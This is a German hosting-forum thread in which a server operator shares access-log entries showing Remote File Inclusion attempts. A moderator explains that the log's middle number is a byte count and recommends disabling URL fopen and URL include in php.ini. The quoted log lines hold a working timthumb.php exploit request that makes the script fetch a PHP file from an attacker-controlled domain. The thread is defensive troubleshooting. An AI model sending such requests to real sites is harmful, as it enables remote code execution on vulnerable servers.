Remote File Inlusion - Angriffe von meinem Server

#1
Hallo,

anscheinend wird über meinen Server ab und zu) seit wenigen Tagen (also seit gestern) ein Remote File Intrusion auf anderen Serverv versucht.

In den Logfiles finde ich:

web-ng:/var/log/httpd# grep taxo /var/log/httpd/ispconfig_access_log_2012_01_19
localhost||||1229||||78.46.75.84 - - [19/Jan/2012:23:18:41 +0100] "GET /?q=taxonomy/term/4//wp-content/themes/manifesto/scripts//timthumb.php%3fsrc=http://img.youtube.com.ericharland.net/bogel.php HTTP/1.1" 200 1229 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"

localhost||||1229||||78.46.75.84 - - [19/Jan/2012:23:18:43 +0100] "GET /?q=taxonomy/term//wp-content/themes/manifesto/scripts//timthumb.php%3fsrc=http://img.youtube.com.ericharland.net/bogel.php HTTP/1.1" 200 1229 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"

Ich benutze ISPConfig 2 (daher der Pfad zu der Logdatei)

Kann mir jemand erklären wie ich:

localhost||||1229||||78.46.75.84

deuten muss

also localhost scheint klar - dahinter die IP Adresse meines Servers
Aber die Zahl dazwischen kann ich nicht zuordnen!
 

Till

Administrator
#2
anscheinend wird über meinen Server ab und zu) seit wenigen Tagen (also seit gestern) ein Remote File Intrusion auf anderen Serverv versucht.
Schau mal in die php.ini Datei, es sollte URL Fopen und URL Include ausgeschaltet sein.

Aber die Zahl dazwischen kann ich nicht zuordnen!
Das ist die Größe der heruntergeladenen Daten in Bytes und wird zur Erstellung der Trafficstatistik verwendet.
 

Werbung